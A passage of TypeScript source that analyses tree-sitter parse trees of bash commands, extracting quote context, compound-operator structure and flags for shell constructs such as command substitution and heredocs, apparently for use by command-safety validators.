 *   $(...)/${...} inside them and validators need to see those patterns.
 *   Matches the sync path's extractHeredocs({ quotedOnly: true }).
 *
 * @param rootNode Root of the parse tree (cast to TreeSitterNode unchecked).
 * @param command The command text the tree was parsed from.
 */
export function extractQuoteContext(
  rootNode: unknown,
  command: string,
): QuoteContext {
  // One walk gathers every kind of quote span.
  const collected: QuoteSpans = { raw: [], ansiC: [], double: [], heredoc: [] }
  collectQuoteSpans(rootNode as TreeSitterNode, collected, false)
  const { raw, ansiC, double: doubleQuoted, heredoc } = collected

  // withDoubleQuotes: drop literal-quoted spans entirely, and drop only the
  // two `"` delimiter characters of each double-quoted span so its content
  // survives. This mirrors the regex extractQuotedContent() semantics where
  // `"` toggles quote state but content is still emitted.
  const droppedPositions = buildPositionSet([...raw, ...ansiC, ...heredoc])
  for (const [start, end] of doubleQuoted) {
    droppedPositions.add(start) // opening "
    droppedPositions.add(end - 1) // closing "
  }
  const withDoubleQuotes = command
    .split('')
    .filter((_char, index) => !droppedPositions.has(index))
    .join('')

  // fullyUnquoted: every quoted span removed.
  const fullyUnquoted = removeSpans(command, [
    ...raw,
    ...ansiC,
    ...doubleQuoted,
    ...heredoc,
  ])

  // unquotedKeepQuoteChars: content removed, delimiters retained.
  type DelimitedSpan = [number, number, string, string]
  const delimitedSpans: DelimitedSpan[] = [
    ...raw.map(([start, end]): DelimitedSpan => [start, end, "'", "'"]),
    // ansi_c_string spans include the leading $; keep it so the result
    // matches the regex path, which treats $ as unquoted preceding '.
    ...ansiC.map(([start, end]): DelimitedSpan => [start, end, "$'", "'"]),
    ...doubleQuoted.map(([start, end]): DelimitedSpan => [start, end, '"', '"']),
    // Heredoc redirect spans have no inline quote delimiters: strip fully.
    ...heredoc.map(([start, end]): DelimitedSpan => [start, end, '', '']),
  ]
  const unquotedKeepQuoteChars = replaceSpansKeepQuotes(command, delimitedSpans)

  return { withDoubleQuotes, fullyUnquoted, unquotedKeepQuoteChars }
}
/**
 * Extracts the compound structure of a command from the AST: which
 * operators join its parts, what the parts are, and whether pipelines,
 * subshells or command groups occur.
 * Replaces isUnsafeCompoundCommand() and splitCommand() for the
 * tree-sitter path.
 *
 * @param rootNode Root of the parse tree (cast to TreeSitterNode unchecked).
 * @param command Original command text; used as the sole segment when the
 *   walk collects none.
 */
export function extractCompoundStructure(
  rootNode: unknown,
  command: string,
): CompoundStructure {
  const operators: string[] = []
  const segments: string[] = []
  let hasPipeline = false
  let hasSubshell = false
  let hasCommandGroup = false

  // Records the node's text as a segment, raising the structure flag that
  // corresponds to its type (if any).
  const recordSegment = (node: TreeSitterNode): void => {
    if (node.type === 'pipeline') hasPipeline = true
    else if (node.type === 'subshell') hasSubshell = true
    else if (node.type === 'compound_statement') hasCommandGroup = true
    segments.push(node.text)
  }

  // Classifies a single node by presenting it as the only child of a
  // shallow copy of `parent`.
  const visitOnly = (parent: TreeSitterNode, only: TreeSitterNode): void =>
    visitChildren({ ...parent, children: [only] } as TreeSitterNode)

  // Classifies each child of `node` (initially the program node).
  function visitChildren(node: TreeSitterNode): void {
    for (const child of node.children) {
      if (!child) continue

      switch (child.type) {
        case 'list':
          // list nodes hold the && / || operators and their operands.
          for (const member of child.children) {
            if (!member) continue
            if (member.type === '&&' || member.type === '||') {
              operators.push(member.type)
            } else if (
              member.type === 'list' ||
              member.type === 'redirected_statement'
            ) {
              // Nested list, or a redirected_statement wrapping one. For
              // `cmd1 && cmd2 2>/dev/null && cmd3` the redirected_statement
              // wraps `list(cmd1 && cmd2)`; without recursing, the inner
              // `&&` would be missed.
              visitOnly(node, member)
            } else {
              recordSegment(member)
            }
          }
          break

        case ';':
          operators.push(';')
          break

        case 'pipeline':
        case 'subshell':
        case 'compound_statement':
        case 'command':
        case 'declaration_command':
        case 'variable_assignment':
          recordSegment(child)
          break

        case 'redirected_statement': {
          // `cd ~/src && find path 2>/dev/null` is parsed as
          // program → redirected_statement → (list …) + file_redirect; the
          // same wrapping happens for `cmd1 | cmd2 > out` and
          // `(cmd) > out`. Look through the wrapper, ignoring the
          // file_redirect children, which do not affect classification.
          const bodies = child.children.filter(
            inner => inner && inner.type !== 'file_redirect',
          )
          if (bodies.length === 0) {
            // Redirect with no body (shouldn't happen, but fail-safe).
            segments.push(child.text)
          }
          for (const body of bodies) {
            visitOnly(child, body)
          }
          break
        }

        case 'negated_command':
        case 'if_statement':
        case 'while_statement':
        case 'for_statement':
        case 'case_statement':
        case 'function_definition':
          // `! cmd` and control-flow constructs count as one segment in
          // full, and are also descended into so that inner pipelines,
          // subshells and operators are still detected.
          segments.push(child.text)
          visitChildren(child)
          break
      }
    }
  }

  visitChildren(rootNode as TreeSitterNode)

  // Nothing recognised: treat the whole command as a single segment.
  if (segments.length === 0) {
    segments.push(command)
  }

  return {
    hasCompoundOperators: operators.length > 0,
    hasPipeline,
    hasSubshell,
    hasCommandGroup,
    operators,
    segments,
  }
}
/**
 * Reports whether the AST contains a real operator node (;, && or ||) or
 * a `list` node, anywhere in the tree.
 *
 * This is what eliminates the `find -exec \;` false positive: tree-sitter
 * parses `\;` as part of a `word` node (an argument to find), NOT as a `;`
 * operator. When no operator node exists there are no compound operators,
 * and hasBackslashEscapedOperator() can be skipped.
 *
 * Note that the search does not look at where a matching node sits; any
 * node with one of these types counts.
 */
export function hasActualOperatorNodes(rootNode: unknown): boolean {
  // A `list` node implies compound operators, so it counts as well.
  const operatorLikeTypes = new Set([';', '&&', '||', 'list'])

  // Pre-order search that stops at the first hit; falsy children are
  // skipped.
  const containsOperator = (node: TreeSitterNode): boolean =>
    operatorLikeTypes.has(node.type) ||
    node.children.some(child => Boolean(child) && containsOperator(child))

  return containsOperator(rootNode as TreeSitterNode)
}
/**
 * Scans the whole AST and reports which security-relevant constructs
 * occur at least once: command substitution, process substitution,
 * parameter expansion (`expansion` nodes), heredocs and comments.
 *
 * @param rootNode Root of the parse tree (cast to TreeSitterNode unchecked).
 */
export function extractDangerousPatterns(rootNode: unknown): DangerousPatterns {
  // Gather every node type present, then derive the flags from the set.
  const typesPresent = new Set<string>()
  const gatherTypes = (node: TreeSitterNode): void => {
    typesPresent.add(node.type)
    for (const child of node.children) {
      if (child) gatherTypes(child)
    }
  }
  gatherTypes(rootNode as TreeSitterNode)

  return {
    hasCommandSubstitution: typesPresent.has('command_substitution'),
    hasProcessSubstitution: typesPresent.has('process_substitution'),
    hasParameterExpansion: typesPresent.has('expansion'),
    hasHeredoc: typesPresent.has('heredoc_redirect'),
    hasComment: typesPresent.has('comment'),
  }
}
/**
 * Runs every extractor in this module against the same root node and
 * bundles the results: quote context, compound structure, operator-node
 * presence and dangerous-pattern flags.
 *
 * Each extractor performs its own traversal of the tree.
 *
 * NOTE(review): an earlier version of this comment required the data to be
 * extracted before tree.delete() is called, while the file header says the
 * native NAPI parser returns plain JS objects that need no cleanup —
 * confirm whether any lifetime constraint on `rootNode` still applies.
 *
 * @param rootNode Root of the parse tree.
 * @param command The command text the tree was parsed from.
 */
export function analyzeCommand(
  rootNode: unknown,
  command: string,
): TreeSitterAnalysis {
  const quoteContext = extractQuoteContext(rootNode, command)
  const compoundStructure = extractCompoundStructure(rootNode, command)
  const operatorNodesPresent = hasActualOperatorNodes(rootNode)
  const dangerousPatterns = extractDangerousPatterns(rootNode)

  return {
    quoteContext,
    compoundStructure,
    hasActualOperatorNodes: operatorNodesPresent,
    dangerousPatterns,
  }
}